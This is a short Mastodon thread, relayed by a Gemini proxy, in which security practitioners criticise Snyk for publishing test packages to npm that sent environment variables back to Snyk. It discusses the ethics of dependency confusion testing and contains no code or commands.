Ancestors

Toot

Written by Will Dormann on 2025-01-18 at 22:46

Snyk publishes malicious packages to the public NPM registry.

I'm no expert on ethics, but I believe that this is... frowned upon?

https://sourcecodered.com/snyk-malicious-npm-package/

https://news.ycombinator.com/item?id=42690473

https://snyk.io/blog/snyk-security-labs-testing-update-cursor-com-ai-code-editor/

=> More informations about this toot | More toots from wdormann@infosec.exchange

Descendants

Written by mandela on 2025-01-18 at 23:01

@wdormann a lot of red team ops end up using this same technique in public package repos. Usually they are smart to obfuscate their code and make sure the bad code only runs on their target systems.

This feels like a junior engineer at snyk went off the rails.

=> More informations about this toot | More toots from mandela@infosec.exchange

Written by thepwnicorn on 2025-01-19 at 00:19

@wdormann sending the content of env vars back to Snyk should have been a no go, because they would have almost certainly contained secrets of CI environments or dev systems, if a dependency confusion attack were successful.

=> More informations about this toot | More toots from thepwnicorn@infosec.exchange

Proxy Information

Original URL: gemini://mastogem.picasoft.net/thread/113851784780748738
Status Code: Success (20)
Meta: text/gemini
Capsule Response Time: 257.198286 milliseconds
Gemini-to-HTML Time: 1.133398 milliseconds

This content has been proxied by September (3851b).